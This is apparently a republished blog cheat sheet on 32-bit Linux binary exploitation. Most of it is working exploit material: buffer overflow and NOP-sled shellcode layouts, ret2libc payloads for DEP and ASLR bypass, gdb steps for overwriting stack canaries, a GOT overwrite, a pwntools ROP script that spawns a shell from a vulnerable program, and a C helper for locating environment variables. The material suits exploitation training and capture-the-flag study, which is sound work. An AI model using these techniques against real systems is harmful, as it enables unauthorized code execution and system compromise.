32-bit Binary Exploitation Cheatshet
2023-5-26 05:26:0 Author: www.hackingdream.net(查看原文) 阅读量:24 收藏 
# Simple BOF 
# jmp_address - somewhere at the start of NOPS
NOPS + shellcode + A*(EBP_offset-len(shellcode)) + jmp_address

#When you have less buffer add the exploit in env and try t ocall it 
export SHELLCODE=$(python -c 'print "\x90"*200')$(cat shellcode)
#find the size of the stack 
p/d ($ebp-$esp)/4+4
#Update the size 
$(python -c 'print "\x0a\xda\xff\xff"*SIZE')

#DEP/NX Bypass 
Ret2LIC - Buffer + SYSTEM + EXIT + /bin/sh 

# DEP + ASLR Bypass
Ret2LIC - Buffer + SYSTEM + EXIT + /bin/sh  > payload
while true; do ./vuln $(cat payload.txt);done

#Canary Bypass
- Set a break point on the stack right after the canary cookie creation 
- Find the address of stack cookie and note it down.
	- EX: DWORD PTR [esp+0x1c],eax
	-  x/wx $esp+0x1c
- Use RET2LIBC technique to exploit the program, then after the buffer, we will restore the canary cookie.  - Buffer + SYSTEM + EXIT + /bin/sh 
- Right before the cookie value is validated we pause the session and update the cookie value
- #Get the stack cookie - canary 
		gdb-peda$ x/wx $esp+0x1c
		0xbffff05c:	0xf6f56000
>  set {int}0xbffff05c=0xf6f56000


# CANARY + RELRO Bypass 
#find a function that needs to be called from GOT and send both the addresses one after another 
other_function sytem_address
$(python -c 'print "\x0c\xa0\x04\x08"') $(python -c 'print "\x10\x13\xe5\xb7"') 


# ROP Chaining 
# call printf function first then run your shell 
# for single jump use popret
# for double jump use pop2ret
payload = buffer + printf_addr + pop_ret + arg_addr + system_addr + exit_addr + binsh_addr

ROP Exploit

from pwn import *

buffer = b"A" * 140

printf_addr = p32(0xb7e31520)
pop_ret = p32(0x80482c9)
print1_addr = p32(0x8048510)

system_addr = p32(0xb7e1d3d0)
exit_addr = p32(0xb7e105a0)
binsh_addr = p32(0xb7f5e1db)

#payload = buffer + system_addr + exit_addr + binsh_addr

payload = buffer + printf_addr + pop_ret + print1_addr + system_addr + exit_addr + binsh_addr

# Launch the vulnerable program and feed it the payload
p = process('./v1')
p.sendline(payload)
p.interactive()
GET ENV Address

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char *argv[]) {
	char *ptr;

	if(argc < 3) {
		printf("Usage: %s <environment variable> <target program name>\n", argv[0]);
		exit(0);
	}
	ptr = getenv(argv[1]); /* get env var location */
	ptr += (strlen(argv[0]) - strlen(argv[2]))*2; /* adjust for program name */
	printf("%s will be at %p\n", argv[1], ptr);
}

文章来源: https://www.hackingdream.net/2023/05/32-bit-binary-exploitation-cheatshet.html
如有侵权请联系:admin#unsafe.sh